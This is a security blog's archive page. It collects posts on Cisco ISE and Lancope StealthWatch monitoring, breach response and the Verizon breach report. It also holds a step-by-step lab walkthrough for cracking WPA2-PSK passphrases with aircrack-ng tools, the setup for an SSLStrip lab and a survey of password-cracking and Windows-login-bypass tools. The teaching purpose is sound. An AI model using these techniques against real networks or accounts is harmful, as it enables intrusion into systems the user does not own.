Tag Archives: Stealth Watch

June 17, 2013

Post NAC: Cisco Identity Services Engine (ISE) and Lancope StealthWatch for Total Access Control

Controlling who and what access your network is a critical element to keep your resources safe from malicious threats. Network Admission Control (NAC) solutions like the Cisco Identity Services Engine (ISE) can police who and what is permitted network access as well as enforce policy for those devices. Examples would be permitting an administrator with a government furnished Windows 7 laptop access to VLAN 10, which holds internal servers, while provisioning a marketing professional’s iPad with VLAN 20 access, which is limited to Internet and email through the use of ACLs.

But what happens once a device is granted network access? Access control solutions are pretty much out of the picture, aside from limited profile monitoring for identifying changes in device types. (Examples of this limited functionality include figuring out that an “Apple Device” is really an “iPad” based on DHCP and other traffic seen while the user is browsing the network, or blocking a user who attempts to spoof a printer’s MAC address to gain network access.)

Example ISE policy for profiled Apple iPad or iPhone and User “Joey” to get Apple_Mobile Access

Beyond this is where the handoff to an internal monitoring solution such as Lancope’s StealthWatch System should come into play. An internal monitoring solution can handle security where the access control solution leaves off. These solutions monitor all devices on the network for performance and suspicious behavior, regardless of whether or not they were approved by NAC. Examples of devices that NAC solutions may miss are virtual systems inside the data center, network sharing such as turning an iPhone into a wireless hub, Linksys routers using NATing to hide unauthorized access, or devices accessing a part of the network without access control.

An important function of a post access control solution is identifying devices compromised while on the network, since most access control solutions only verify policy for patch updates and other installed security applications (e.g. antivirus). Being compromised while on the network can happen when users surf the Internet, plug in a USB drive hosting malware, open an infected email, etc. In most cases, the threats that compromise internal users are not common viruses, meaning there isn’t a known signature that can be used by antivirus or firewall technologies to flag the attack. A post access control technology that leverages behavior as the means to identify threats can catch not only insider threats posed by authorized users, but also stealthy, externally-launched threats that bypass the security measures typically enforced by a NAC policy.

The integration of Cisco ISE for access control and Lancope’s StealthWatch for internal network monitoring saves customers money by leveraging NetFlow data already inherent in routers, switches and other network infrastructure devices to essentially turn the entire network into a giant sensor grid for detecting anomalous activity. Both Cisco and Lancope use industry standards leveraged by most vendor equipment (Cisco ISE using 802.1x and Lancope using NetFlow). Both companies also offer physical and virtual versions of all solution components, and both can be architected in a centralized or distributed design.

Here are the beneficial actions that can be taken by combining access control and internal monitoring:

Enforce policy on devices accessing the network.
Identify unauthorized devices not seen by NAC.
Monitor devices for threats and performance during their entire lifecycle on network.
Know who and what is on the network as well as what they are doing.
Automatically provision network access for trusted users and guests.
Identify threats on the internal network including malware, botnets and data loss.
Limit access for remediation of an identified threat.
Document a threat’s entire presence on the network for information assurance.

And here are the steps for setting up Cisco ISE and StealthWatch within a network:

Configuring On-Boarding via BYOD in ISE HERE
Setting up a Lancope StealthWatch small lab HERE

Click here for more information on how Cisco and Lancope work together to defend governments and enterprises against advanced threats.

Rating: 0.0/5 (0 votes cast)

1 Comment

Filed under Bring Your Own Device BYOD, Network Admission Control

Tagged as Access Control, advanced persistent threat, ATP, botnets, Cisco, Cisco NAC, cisco security, Clean Access, Compliance, Enforce Network Policy, Home, Identity Services Engine, insider threat, iPad, iPhone, ISE, ISE Integration, ISE Lancope, ISE1.0, ISE1.1, Joey, Joey Muniz, joseph, joseph muniz, LanCope, Lancope Integration, malware, Muniz, NAC, NAC appliance, NAC Integration, NAC Lancope, netflow, network access control, network security, Post Access Control, Security, Stealth Watch, StealthWatch, StealthWatch Collector, StealthWatch lab, StealthWatch Manager, Total Access Control, www.lancope.com

June 9, 2013

Breaking WPA2-PSK with Kali Linux : wireless.

Great post by Aamir Lakhani on breaking WPA2_PSK. The original can be found HERE

WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase.

Below you will find a few easy steps on how to break WPA2 with a weak passphrase.

Breaking the wireless Lab Home Network:

I set up a test network for this blog article. The client box is logging into my wireless Lab test network. This is the network we will break.

Step 1:

The first step is to verify the router configuration. Normally in a real penetration test we would not have this option, but since this is a home lab I have a little more flexibility.

In this case the lab access point is securing the wireless network Wireless Lab with WPA2-PSK. It using the passphrase Cisco123. You can use any wireless router to setup your wireless lab.

Step 2:

We will be using Kali Linux to complete this task. Kali will need a wireless card configured before it can be used by the operating system. I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH adapter because it a duel band adapter. However, this card is very difficult to obtain since it is no longer sold.

The iwconfig command will show any wireless cards in the system. I am using a RealTek wireless card. Linux ships with the RealTek drivers, making it a Linux plug and play wireless card.

The operating system recognizes a wireless interface named wlan0.

Step 3:

My next step will be to enable the wireless interface. This is accomplished issuing the ifconfig wlan0 up command.

Step 4:

I need to understand what wireless networks my wireless card sees. I issue the iwlist wlan0 scanning command.

This command forces the wireless card to scan and report on all wireless networks in the vicinity.

You can see from this example it found my target network: Wireless Lab. It also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password).

Secondly, we see the AP is transmitting on channel 36.This is important because it allows us to be specific on what wireless channel we will want our wireless card to monitor and capture traffic from.

Step 5:

The next step is to change the wireless card to monitoring mode. This will allow the wireless card to examine all the packets in the air.

We do this by creating a monitor interface using airmon-ng. Issue the airmon-ng command to verify airmon-ng sees your wireless card. From that point create the monitor interface by issuing the command: airmon-ng start wlan0

Next, run the ifconfig command to verify the monitor interface is created. We can see mon0 is created.

Now verify the interface mon0 has been created.

Step 6:

Use airodump-ng to capture the WPA2 handshake. The attacker will have to catch someone in the act of authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will display the handshake confirmation in the upper right hand corner of the screen.

Note: We will manually connect to the wireless network to force a handshake. In a future post I will show you how to force a reauthorization to make a device automatically disconnect and reconnect without any manual intervention.

We used the following command: airodump-ng mon0 – -bssid 20:aa:4b:1f:b0:10 (to capture packets from our AP) – -channel 6 (to limit channel hopping) – -write BreakingWPA2 (the name of the file we will save to)

airodump-ng mon0 – -bssid 0E:18:1A:36:D6:22 - -channel 36 – -write BreakingWPA2

(make sure there is no space between “- -”)

To capture the handshake you are dependent on monitoring a legitimate client authenticate to the network. However, it does not mean you have to wait for a client to legitimately authenticate. You can force a client to re-authenticate (which will happen automatically with most clients when you force a deauthorization).

When you see the WPA Handshake Command you know you have captured an valid handshake

example:

Step 7:

We will use aircrack-ng with the dictionary file to crack the password. Your chances of breaking the password are dependent on the password file.

The command on is: aircrack-ng “name of cap file you created” -w “name of your dictionary file”

The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in the BreakingWPA2-01.cap file.

Backtrack 5 ships with a basic dictionary. The dictionary file darkc0de.lst is a popular worldlist that ships with BackTrack5. We added our password Cisco123 in this file to make the test run a little smoother

Many attackers use large dictionaries that increase their chances of cracking a passwords. Many dictionaries contain passwords from real users and websites that have been cracked and posted on the Internet. Some sophisticated dictionaries combine multiple languages, permutations of each word, and key words and phrases from social media sites such as Twitter and Facebook.

Kali does not come with the darkc0de.lst but you can download it from here

In this blog we created a file named “sample.lst” and added the word Cisco123 in it.

Success:

If the password is found in the dictionary file then Aircrack-ng will crack it.

Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as 802.1x, aircrack breaking wireless, Aircrack-ng, AWUS051NH, breaking wireless with Kali, Breaking WPA2, Compliance, cracking wireless, cracking WPA2, hacking wireless, hacking wireless networks, Joey, Joey Muniz, joseph, joseph muniz, kali, Kali Linux, LanCope, Muniz, Security, Stealth Watch, wireless lab, wireless security, wpa2, WPA2 with weak passphrase, WPA2-PSK

May 16, 2013

SSL Strip – Breaking Secure Websites

Aamir Lakhani wrote a overview of how to perform a ssl strip attack. The original post can be found HERE

SSLSTRIP LAB

Before beginning the lab, make sure you have Backtrack 5 R3 VM imported into VMWare Player/Workstation/Server/Fusion, or what ever Virtual machine environment you have chosen to utilize.

The following is an excerpt from the VMWare “Getting started with VMWare Player” VMWare Player 4.0 user guide.

Import an Open Virtualization Format Virtual Machine

You can import an Open Virtualization Format (OVF) virtual machine and run it in Player. Player converts the virtual machine from OVF format to VMware runtime (.vmx) format. You can import both .ovf and .ova files.

OVF is a platform-independent, efficient, extensible, and open packaging and distribution format for virtual machines. For example, you can import OVF virtual machines exported from VMware FusionTM into Player. You can import OVF 1.0 and later files only.

You can also use the standalone OVF Tool to convert an OVF virtual machine to VMware runtime format. The standalone version of the OVF Tool is installed in the Player installation directory under OVFTool. See the OVF Tool User Guide on the VMware Web site for information on using the OVF Tool.

Procedure

In Player, select File > Open a Virtual Machine.
Browse to the .ovf or .ova file and click Open.
Type a name for the virtual machine, type or browse to the directory for the virtual machine files, and click Import. Player performs OVF specification conformance and virtual hardware compliance checks. A status bar indicates the progress of the import process.
If the import fails, click Retry to try again, or click Cancel to cancel the import.

If you retry the import, Player relaxes the OVF specification conformance and virtual hardware compliance checks and you might not be able to use the virtual machine in Player.

After Player successfully imports the OVF virtual machine, the virtual machine appears in the virtual machine library.

Your Lab

In this Lab, we are using Virtual Machine based attack hosts. The Hosts are Linux based Backtrack 5 R3 (based on Ubuntu Linux). The reason for using backtrack is that all of the modules, and associated dependencies for this lab are preloaded with the distribution. The module dependencies for SSLStrip are (these are already loaded with Backtrack):

Python >= 2.5 (apt-get install python)
The python “twisted-web” module (apt-get install python-twisted-web)

Additionally to utilize SSLSTRIP you need (Again already in Backtrack):

Arpspoof or Ettercap (this lab we use Arpspoof, Ettercap has issues with wireless)
IPChains / IPtables
Netstat

Additionally when using backtrack or any Ubuntu distribution, it is a good idea to run APT to updates the existing packages. Backtrack has several custom distribution resources pre configured.

#Use this command to update: apt-get update && apt-get upgrade -y && apt-get dist-upgrade –y

Getting Started

Once your Backtrack virtual machine is installed and booted use the following credentials to log in:

Username: root
Password: toor

Start the desktop environment by issuing the startx command from the terminal session:

Note: It is not mandatory that you utilize a GUI desktop. But for the purposes of this lab it is recommended. Those not as familiar working in a Linux command shell will likely find it simpler to switch between the multiple terminal windows needed to perform the upcoming operations.

You should now see an environment similar to the following:

For the purposes of this LAB we will only be using a single interface, your virtual machine might be configured with multiple Ethernet interfaces. We will need to check if there are multiple (virtual) Ethernet interface enabled.

In the upper left hand corner of the desktop click on the Xterm link.

When see a terminal window open on the desktop you are ready to continue.

Use ifconfig to determine what interfaces are on the virtual machine.

Ifconfig | grep “eth”

This command will filter out all the miscellaneous and just show us the Ethernet interfaces, like below.

If we do indeed have more then one interface enabled issue the command ifdown with the interface name to disable it. If there is an interface named eth1 like shown above issue the command:

Ifdown eth1

The output should be like what is shown below.

Continue reading →

Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as Aamir Lakhani, Access Control, Arpspoof, backtrack, breaking https, breaking secure websites, cracking https, cracking secure websites, Ettercap, hacking, hacking secure websites, Home, IPChains, Joey, Joey Muniz, joseph, joseph muniz, kali, LanCope, Muniz, Netstat, SSL Strip, SSL Strip lab, sslstrip, sslstrip lab, Stealth Watch, vmware, World Wide Technology, world wide technology inc., wwt

May 12, 2013

How Hackers Crack Weak Passwords

People use weak password practices to secure critical information. Weak password practices include using the same password for multiple systems regardless of the value of the asset, dictionary words, short phases and keeping the same passwords for extended periods of time. For example, it’s common to find a password on a non-critical asset such as a PlayStation 3 be the same as a person’s bank account login.

The more information an attack knows about your password profile, the more likely they will crack your password. For example, a policy of “6-10 characters with one upper case letter and special character” actually helps an attacker reduce the target space meaning passwords are weaker with the policy. If an hacker captures a password for another system and notices a formula such as ‘<dictionary word>’ followed by ‘<3 numbers>’, it helps the attacker prepare a dictionary attack (utilities such as Crunch makes this easy). Any password shorter than 10 characters is an easy target to brute force attack based on today’s system process power.

Here are some tools that hackers can use to crack your passwords.

John the Ripper is an old school yet powerful password cracking utility. It has several types of engines that can crack different types of passwords including encryption and hashes. John can detect most hash types (about 90% accurate) and generate matching hash outputs to map back to auto generated passphrases Attackers like John the Ripper because it’s very customizable

John the Ripper cracked 3 passwords from a Linux shadow file.

Hashcat is a password cracking utility. Hashcat is multi-thread tool meaning it can handle multiple hashes and password lists during a single attack session. Hashcat offers many attack options such as brute-force, combinator, dictionary, hybrid, mask and rule-based attacks

Hashcat GUI

Ophcrack

Ophcrack is a Windows password cracker based on rainbow tables (Rainbow tables are pre-computed hash tables). Ophcrack can import hashes from a variety of formats including dumping directly from the SAM files of Microsoft Windows.

Ophcrack Cracking Hashes

Findmyhash

Findmyhash is a python script which uses a free online service to crack hashes. Findmyhash will analyze against multiple website Rainbow tables.

Findmyhash running a MD5 hash against multiple websites

Crunch

Crunch is a tool used to generate password lists. This can be extremely helpful if you are able to gather intelligence on how your target creates passwords. For example, if you capture two passwords and notice the target uses a phase followed by random digits, Crunch can be used to quickly generate a list of that phrase followed by all possible random digits. Perfect tool for defeating company password policies!

Creating a password list for the word “pass” followed by any two numbers

Crunch output. List of all combinations of “pass” and two numbers

Chntpw

An alternative to breaking a Windows password is completely bypassing it. Chntpw is a software utility that can reset or remove a Windows passwords. This gives a hacker with access to your Microsoft Windows SAMs file the ability to obtain Administration privileges.

Chntpw options. Option 1 clears the password.

There are many tools available to break weak passwords. Best practices is using a password longer than 10 characters (having a repeated character at the end even helps!), don’t use dictionary words, change your password periodically, don’t use the same passwords for secure and non secure sources and don’t use a computer that accesses sensitive data for personal use (IE same system for Facebook and configuring routers). I suggest using the first letter of each word of a long sentence so you can remember the password yet the output is random. Hope this helps. All tools shown are free and available on BackTrack / Kali.

Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under General Security, Penetration / Hacking

Tagged as backtrack, Breaking Passwords, Chntpw, Compliance, cracking passwords, Crunch, Data Loss Prevention, DLP, findmyhash, hackers crack weak passwords, hashcat, Home, how to crack passwords, Joey, Joey Muniz, john the ripper, joseph, joseph muniz, kali, LanCope, Muniz, network security, Ophcrack, password cracking tools, password cracking utilities, password policy, password security, passwords, secure passwords, Security, stealing passwords, Stealth Watch, weak passwords

May 6, 2013

Verizon’s 2013 Data Breach Investigations Report

Verizon recently released their annual Data Breach Report (download HERE). This report is based on statics from 19 organizations and showcases 621 security breaches and 47,000 security incidents with the goal of educating the public of the current risks from cyber threats. All results are built from first-hand evidence collected during paid external forensic investigations and related intelligence operations conducted by Verizon from 2004 through 2012.

There are a lot of interesting findings that range from most common attacks to popular targets. According to the report, everybody is a target. The report states, “from pubs to public agencies, mom-and-ops to multi-nations, nobody was immune”. Some attacks had as high as 95% success rates such as phishing meaning “most attackers would be able to slap a “guaranteed” sticker on getting a click”. They even call out that most agencies should mentally be thinking they are already compromised.

To break things down, here are some highlights:

Who are the targets? – Everybody

Who is perpetrating breaches? The majority of attacks are outsiders (92%) however insider is on the rise (14%).

How do breaches occur? 76% was based on weak or stolen credentials followed by hacking (52%) and Malware (40%).

How sophisticated are the attacks? From a range of High to Very Low, the majority of first breaches were done leveraging Low level attacks. I like how they put it by saying “Would you fire a guided missile at an unlocked screen door”.

Who are the Criminals? Organized Crime made up the majority of external attacks (over 50%) while others fell around 20% or less.

The leader for espionage was China while Romania followed by the USA lead for financial crimes. Spyware (including keyloggers) is the common method for financial crimes while multiple forms of malware are typical for espionage.

Social Engineering took a dip the last two years but is now up according to 2012 (29%)

Installing Malware to compromised systems is still the most common vector to be breached.

ATM hacking was top of the list for physical crimes. I wonder if this was triggered by Barnaby Jack’s Blackhat.

2/3 of data compromised was data at rest meaning on an asset like a database or file server. 1/3 of the data was compromised when the data was being processed such as Ramp scrapers, skimmers and key loggers. No data was compromised while in transit (IE compromising a backbone router).

The Verizon report is another confirmation that cyber threats are very real and probably active insider your network. The reports calls out that the most common attacks are easy to execute and have very high success rates (such as phishing campaigns). Standard security products that leverage signatures will not catch many threats called out in this report. The best way to identify these threats is monitoring behavior inside the network and utilize a layered approach to building your security strategy.

Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as 000 security incidents, 2012 report, 2012 threat research, 2013 data breach, 2013 data breach report, 47, 621 security breaches, annual Data Breach Report, Compliance, investigations report, Joey, Joey Muniz, joseph, joseph muniz, LanCope, Muniz, network security, Security, security research, Stealth Watch, top threats, verizon, verizon report

April 26, 2013

5 Steps to Take Right After Suffering a Cyber Security Breach

Thanks to my guest writer Kyle Olson for this post. Kyle’s bio is below.

Security breaches on your website hosting servers and any other server based online assets are no laughing matter. Suffering one of these breaches can mean anything from the theft of data for fraud related purposes to the total destructive erasure of all your information just for the fun of it (Hackers aren’t exactly known for always being motivated by money)

Whatever the case may be, you as the hard working owner of a site you spent months or years building, can enjoy the fun position of watching everything you built come crashing into zero in less time than it takes you to have lunch. This is not something you want, and especially since it can be avoided through some fairly straightforward security procedures that would have saved you nicely.

Anyhow, what’s done is done, you’ve been hacked, and the only thing left to do is save what you can. Let’s cover how you can do that with 5 essential and effective steps.

1. Don’t Panic, Be Methodical

This is the first and most basic thing you need to do; calm down and proceed methodically. Yes, a hack is a severe thing that needs to be dealt with quickly, but running around like a headless chicken won’t solve anything. If you calmly assess the situation, go through the possibilities and the steps we’re about to cover, you’ll have a much better chance of successfully countering any damaging effects than if you work randomly or just freeze up, waiting for the situation to improve on its own.

2. Check in With Your Hosting Provider

Contact your Hosting provider as soon as you’ve noticed that your site is down, redirecting to suspicious third party sites, or showing unmistakable signs of serious malfunction. Do the same if you can’t access key parts of your back end admin such as servers, cpanel or CMS login. For one thing, your hosting provider has the tools and expertise to help you with resolving your hack or saving your data, and secondly, they can help you uncover vital information about the hack, such as how many people it’s affecting and how it might have occurred.

3. Make a Record of Everything and Save All Suspicious data

As soon as you start to notice something wrong with your servers or site, also start noting things down. Make a record of everything you saw, experienced and the times at which you saw it. Additionally, save copies of any malicious or suspicious code, files and processes. Even if you need to destroy them as part of your damage control, first save all such data on a remote medium such as USB. This saving also includes (when possible) making a mirror copy ISO of your entire drive or server.

Just as if you’re dealing with a police crime scene, creating a record of events and a chain of evidence will help you more clearly understand and possibly resolve your hack source.

4. Shut Your Site and FTP off then Start Backing Up Your Data

Back up everything in your servers and all associated files to a remote storage medium. Don’t worry if some of it is still contaminated with malicious code –you can later scan and clean it of everything abnormal—for now the key thing is to save as much of your site data as quickly as possible.

Before you start your backup process up, disconnect your site from all remote access. This may mean taking it offline and cutting off access to all FTP accounts. You can also later change all of your server/site access passwords in these FTP profiles and elsewhere.

5. Download Everything Again

Once you’ve performed a thorough backup of all your data, cut your site off from outside access, changed all your access passwords and stopped as much malicious activity as possible, you can now download fresh programs for any third party applications that were supporting your site on the server. These may include LAMP software (Linux, Apache, MySQL, PHP), plugins like Java, Flash and Adobe or a CMS bundle like WordPress.

Having downloaded the newest, cleanest copies of all these applications to your newly secured server, you can start re installing all your salvageable backed up data from the site before it was hacked.

When all else fails, you can always contact a company that will perform digital forensics tests to determine the cause of the incident.

About the author: Kyle Olson has written for the tech industry for over 10 years and has operated his own small business in the industry. When he’s not writing poignant articles, you can find him covering civil engineers in Boston or working on his forthcoming novel.

Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under Internet Defense, Security Management & Analysis

Tagged as 5 steps, Compliance, cyber security, Cyber Security Breach, Data Loss, Digital Third Coast Internet Marketing, hacked website, hacking, hacking websites, Home, Joey, Joey Muniz, joseph, joseph muniz, Kyle, Kyle Olson, LanCope, Muniz, network security, Olson, post security breach, Security, service provider security, Stealth Watch, website breach, website security, www.digitalthirdcoast.net

April 15, 2013

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

The terms Penetration Test, Vulnerability Assessment and Security Audit are often blended together when requested by clients or offered by security service providers. All three terms have security aspects however are very different regarding what purpose they serve as well as the expected deliverable.

A Security Audit typically means evaluating a system or application’s risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies and processes.

Most requests for Security Audits are focused on passing an official audit (IE preparing for a corporate or government audit) or proving the baseline requirements are met for a mandatory set of regulations (HIPAA, PCI, etc.). In many cases, Security Audit services do not include any level of insurance or protection if an audit isn’t successful post services meaning services will only provide information that a client can use to become compliant.

IMPORTANT: In many cases, security audits give customers a false sense of security. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today’s cyber world. It is highly recommended to go beyond standards and baselines to raise the level of security to an acceptable level of protection for real world threats.

A Vulnerability Assessment is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. A vulnerability is a gap, error or weakness in how a system is designed, used and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges or denial-of-service to the asset.

Vulnerability Assessments typically stop once a vulnerability is found meaning services doesn’t include executing an attack against the vulnerability to verify if it’s legitimate. A Vulnerability Assessment deliverable provides potential risk associated with all vulnerabilities found with possible remediation steps. There are many tools that can be used to scan for vulnerabilities based on system type, operating system, ports open for communication and other means. Vulnerability Assessments are a valuable way to assess a network for potential security weakness to identify where to invest for future security.

A Penetration Test is attempting to attack vulnerabilities in a similar method of a real malicious attacker. Typically, penetration services are requested when a system or network has exhausted investments in security and seeking to verify if all avenues of security have been covered. The key difference between a Penetration Test and Vulnerability Assessment is a penetration test will act upon vulnerabilities found and verify if they are legit reducing the list of confirmed risk associated with a target.

IMPORTANT: One popular misconception is a Penetration Testing service enhances IT security since services have a higher cost associated than other security services. Penetration Testing does not make IT networks more secure since services evaluates existing security! A customer should not consider a penetration test if there is a belief the target is not completely secure.

Hopefully these definitions help define future security service requests.

Rating: 0.0/5 (0 votes cast)

1 Comment

Filed under General Security

Tagged as audit, baselines, Compliance, compliant, Defining Security, HIPAA, Joey, Joey Muniz, joseph, joseph muniz, LanCope, Muniz, network security, Network Security Services, pci, Pen Test, pen testing, Penetration Test, Penetration Testing, RFI, RFQ, Security, security audit, Security Definitions, Security Services, standards, Stealth Watch, StealthWatch, vulnerability, Vulnerability Assessment, wireless security

March 27, 2013

Installing Lancope StealthWatch on a Mac mini for Small Lab

Lancope enables visibility for security and network performance. Security capabilities focus on identifying insider threats such as botnets, malware and data loss using non-signature network wide correlation of all traffic. Pretty much anything touching the physical or virtual network leaves a footprint known as NetFlow that is investigated for malicious intent and performance statics.

Lancope offers a virtual and physical appliance option for the StealthWatch technology making it easy to build a lab. This post will explain how to build a simple Lancope lab integrated with Cisco ISE 1.2 beta using an Apple Mac mini server hosting vSphere ESXI 5.1 with ASA 5505 firewall.

It’s important to understand components of Lancope.

StealthWatch Manager (SMC)– This is the centralized system that manages all other components. Administrators will access this system’s IP for GUI management.
StealthWatch Collector – This is what collects NetFlow. All devices generating NetFlow will send data to this device for correlation.
StealthWatch Sensor – This generates NetFlow on behalf of devices unable to send NetFlow. This also can view application layer data providing additional context.
StealthWatch Identity Box OR Cisco ISE – These identify users and devices based on authentication and profiling. IP addresses are linked to USER information.
StealthWatch Replicator – This replicates UDP management data such as Flow data, SNMP traps and syslog.
StealthWatch SLIC – This is a reputation feed that correlates external known threats with possible insider threats.

My lab is using virtualized appliances of all Lancope technology components. You can obtain Lancope .OVA files preloaded on Cisco 3850 switches, Lancope’s website or from a solution provider. The first step is loading the Lancope .OVAs into vSphere. All appliances will ask for basic IP, DNS and NTP information upon launching. The default login for everything is either admin or root and lan1cope or lan411cope. I had some problems with default logins and recommend accessing the administration of each Lancope appliance using command line, typing SystemConfig and resetting the passwords prior to logging into the GUI.

SystemConfig found in the appliance command line

Lancope SMC ESXI Properties

The Lancope SMC requires a minimum of 8 Gigs or memory and 2 CPUs. Step up is basic IP and accessing its GUI via https. Additional system configuration can be done by clicking Administer this server or the User GUI can be opened by clicking Start. One important first step in the GUI is adding the main inside network subnet to the Catch All.

Adding Inside Network To Lancope Catch All

Lancope Collector ESXI Properties

The Lancope Collector lists an 8 Gig memory requirement with 2 CPUs however ESXI 5.1 gave a resource error message upon launching. I reduced the Memory to 4 Gigs per CPU, which fixed that issue. Once the Lancope Collector is up, access its GUI via https. You must point it at the SMC under the configuration tab.

I enabled NetFlow on an ASA5505 firewall (running 8.2(2) or greater) and pointed it at the Lancope Collector for network visibility. My ASA 5505 is also powering my 1121 Access Point for wireless. To enable NetFlow in ASDM, click Configuration under Device Management, click NetFlow under Logging, changed template timeout to 1 min, delay of 15 seconds and checked Disable Redundant Syslog”. Select Inside, enter the collector’s IP and UDP port of 2055.

Creating Netflow Collector in ASA

Next create a firewall policy under Firewall and Server Policy Rules. Click Global, give it a name, select All Traffic, click the tab for NetFlow and select the IP you built under device management. NOTE: If you update device management, you must first delete its reference under the firewall policy to avoid errors.

Add Firewall Policy in ASA

To add visibility into my ESXI environment, I have loaded a Lancope virtual Sensor. The Lancope Sensor requires 1 Gig of memory and 1 CPU. Once the Sensor is up, you must point it at the Lancope Collector and add the ESXI server. Prior to doing that, you must create a read-only user account in ESXI. NOTE: ESXI has discontinued GROUPs. Click Local Users & Groups and create a new user by right clicking and ADD. Give the user a name and password. Next click Permissions right click your New User and Edit. Add a permission of Read-Only. Once the account is ready, login to the https of the Lancope Sensor. Click the Configuration tab and add the Lancope Collector. Next, go under Configuration and add your ESXI server. If the steps are performed correctly, the SMC should automatically detect the new Lancope Sensor and virtual environment.

Adding VMware to Lancope SMC

I have ISE 1.2 providing admission control for my LAN and wireless networks. ISE data can be imported into the Lancope SMC. This is done from the GUI by right clicking Identity Services in the Lancope SMC tree and clicking ADD. Fill out the ISE information using the admin login for ISE.

At this point, the Lancope SMC has NetFlow from an ASA firewall seeing LAN and wireless traffic, ISE authentication and NetFlow from inside a virtualized environment. I plan to add SLIC feed for reputation once I obtain a license. I now have full visibility of my home network.

Lancope SMC Device Tree

Rating: 0.0/5 (0 votes cast)

2 Comments

Filed under Security Management & Analysis

Tagged as asa, ASA 5505, ASA firewall, Cisco, Cisco NAC, Clean Access, Compliance, Data Loss Prevention, DLP, esxi, esxi 5.1, Home, Identity Services Engine, ISE, ISE 1.2, ISE1.0, Joey, Joey Muniz, joseph, joseph muniz, lan1cope, lan411cope, LanCope, Lancope lab, Mac mini, Mac mini esxi, mac mini lab, mobile, Muniz, NAC, netflow, netflow ninja, network access control, Security, SLIC, SMC, Stealth Watch, StealthWatch, StealthWatch Collector, StealthWatch lab, StealthWatch Manager, StealthWatch Replicator, StealthWatch Sensor, SystemConfig, vmware

March 18, 2013

Situational Awareness For Cyber Threat Defense

Aamir Lakhani did a great post on Situational Awareness. The original post ca be found HERE

Illustration by Kekai Kotaki

Problem

Cisco Systems in their Cyber Security Threat Defense white papers outlines how the network security threat landscape is evolving. They describe how modern attacks are stealthy and evade traditional security perimeter defenses.

Traditional monitoring and reporting tools are no longer sufficient in detecting true threats on the network. Modern security tools and hardware devices such as firewalls, anti-virus, patch management solutions, IPS, and other solutions can only provide a small amount of relief against attacks. Most of these tools seem to be really implemented to fulfill some sort of checkmark for an auditor on a compliance form. Security professional know these tools, although very important, alone don’t provide a full security defense architecture.

Furthermore, as security threats and malware invade systems, security administrators are having trouble understanding the nature of attacks, how they occur, and how to defend against them. Remember you can’t fight what you don’t understand.

“It is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle.”

- Sun Tzu, The Art of War (source: http://en.wikiquote.org/wiki/Sun_Tzu)

Image Source: Cisco Identity Services Engine

Cisco Identity Services Engine provides true network identification, profiling, and access controls.

Combined as a center piece for Cisco’s TruseSec Solution, Cisco ISE creates a secure ecosystem treating security as a holistic solution.

Federal Cyber Initiatives

New mandates are making cyber security front and center of the news. President Obama recently challenged the nation and the Federal government in the United States to increase its cyber defense capabilities. As Federal IT budgets are getting slashed back in 2013; however, spending for cyber security appears to be increasing in the eyes of the casual on-looker.

Cisco Systems, in their Cyber Threat Defense White Paper discusses how “with increasingly sophisticated cyber attacks like WikiLeaks on the rise, federal agencies require more innovative solutions for maintaining a strong security posture. Additionally, with the evolution of the CNCI (Comprehensive National Cybersecurity Initiative), federal agencies are being required to take a more holistic and collaborative approach to analyzing threat information across the totality of government networks for improved incident response and forensic investigation.”

Being constantly bombarded with continuous threats, how can security professionals even guadge they are being attacked or a threat is posing a clear and present danger (yes that was a Harrison Ford shout out).

RSA NetWitness Logo

Image Source: RSA

How To Solve The Problem

I recommend creating a conceptional framework for Threat Defense Visibility and Awareness program. The goal of program should be to (1) provide a framework that can be built by using products, technologies, and methodologies that are available today, (2) provide network visibility on network health and status in real-time, (3) provide real-time network posture and attack risk baselines, (4) provide a training facility for attack analysis and defense.

What Is Network Visibility?

According to Lancope (source: http://www.lancope.com/), “network visibility focuses on the most complex and dangerous information security threats – threats that lurk in networks for months or years at a time stealing vital information and disrupting operations. This type of solution provides visibility into these threats and context to decipher their targets and potential damage”. Lancope further states on their website, security analysts gain visibility into advanced cyber threats such as:

Network reconnaissance
Network interior malware proliferation
Command and control traffic
Data ex-filtration

Lancope Stealwatch provides network visibility

Understanding trends, anomalies, and threats of the network

Image Source: Lancope

Network visibility gives security administrators the ability to detect problems because they highlight changes in baseline behavior. Did traffic spike a 100%, did outbound traffic suddenly increase, are more requests being transmitted to new domain on the Internet? All these occurrences can indicate an attack. Network visibility shows network security professionals exactly what is different about today’s traffic patterns than what is normally looks like. Continue reading →

Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under Security Management & Analysis

Tagged as aamir, Aamir Lakhani, Accelus eGRC, Access Control, Cisco, Cisco NAC, cisco security, Clean Access, cloudcentrics, Compliance, cyber security, cyber threat defense, Enterprise Security Manager, Federal Cyber Initiatives, GRC, Home, Identity Services Engine, ISE, ISE1.0, Joey, Joey Muniz, joseph, joseph muniz, Lakhani, LanCope, McAfee, McAfee ESM, mobile, mobile device, Muniz, NAC, NAC appliance, netflow, NetWitness, network access control, Network reconnaissance, network security, network visibility, RSA, Security, Security Logging Events, situational awareness, Stealth Watch, StealthWatch, Symantec, Threat Defense Visibility, World Wide Technology, world wide technology inc., wwt

March 4, 2013

Cisco’s Cyber Solutions – What Is Happening In Your Network

